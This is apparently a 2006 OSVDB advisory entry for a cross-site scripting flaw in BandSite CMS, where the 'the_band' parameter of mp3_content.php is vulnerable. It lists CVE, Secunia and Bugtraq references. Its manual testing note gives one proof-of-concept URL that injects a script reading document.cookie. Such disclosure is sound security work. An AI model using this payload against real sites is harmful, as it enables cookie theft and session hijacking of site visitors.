BandSite CMS mp3_content.php the_band Variable XSS

2006-09-20T15:03:50
ID OSVDB:29332
Type osvdb
Reporter OSVDB
Modified 2006-09-20T15:03:50

Description

Manual Testing Notes

/includes/content/mp3_content.php?the_band=<script>alert(document.cookie);</script>

References:

Vendor URL: http://sourceforge.net/projects/bandsitecms/ Secunia Advisory ID:21992 Related OSVDB ID: 29316 Related OSVDB ID: 29318 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0341.html CVE-2006-4985 Bugtraq ID: 20137